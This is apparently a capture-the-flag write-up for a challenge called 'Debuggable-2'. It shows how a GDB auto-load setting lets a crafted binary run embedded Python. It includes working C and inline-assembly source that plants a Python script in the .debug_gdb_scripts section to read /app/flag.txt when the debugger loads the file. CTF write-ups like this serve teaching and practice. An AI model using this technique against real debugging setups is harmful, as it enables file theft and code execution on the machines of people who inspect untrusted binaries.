Debuggable-2
GDB is safe if you never run the binary right?
Files
Dockerfilerun.pyscriptThis time we have an extra file script that has one line: set auto-load safe-path /
This script is put in our .gdbinit for our docker container
The run.py has also changed to run:
qApproach
set auto-load safe-path / basically lets gdb run any script that is embedded in our binary
So all we have to do is embed malicious python code in our binary that outputs the contents of /app/flag.txt
Looking at the GDB Docs we can see some examples for embedding python code
There are 2 ways to do this:
- embedding a refrence to a python script
- embedding a python script itself
We will use the second since we can’t use any python scripts on the server
Solution
We make a basic c file using the docs sample:
asm(".pushsection \".debug_gdb_scripts\", \"MS\",@progbits,1\n"".byte 4\n" // SECTION_SCRIPT_ID_PYTHON_TEXT = 4".ascii \"gdb.printflag\\n\"\n"".ascii \"import gdb\\n\"\n"".ascii \"f = open('/app/flag.txt', 'r')\\n\"\n"".ascii \"content = f.read()\\n\"\n"".ascii \"f.close()\\n\"\n"".ascii \"gdb.write(content)\\n\"\n"".byte 0\n"".popsection\n");
int main(){}which embeds the python code:
import gdbf = open('/app/flag.txt', 'r')content = f.read()f.close()gdb.write(content)Compile this, and we have successfully created a binary that will immediately dump the contents of /app/flag.txt upon loading the binary
Convert this to base64 send to the instance and we get our flag .;,;.{random_embedded_scripting_languages_what_could_possibly_go_wrong}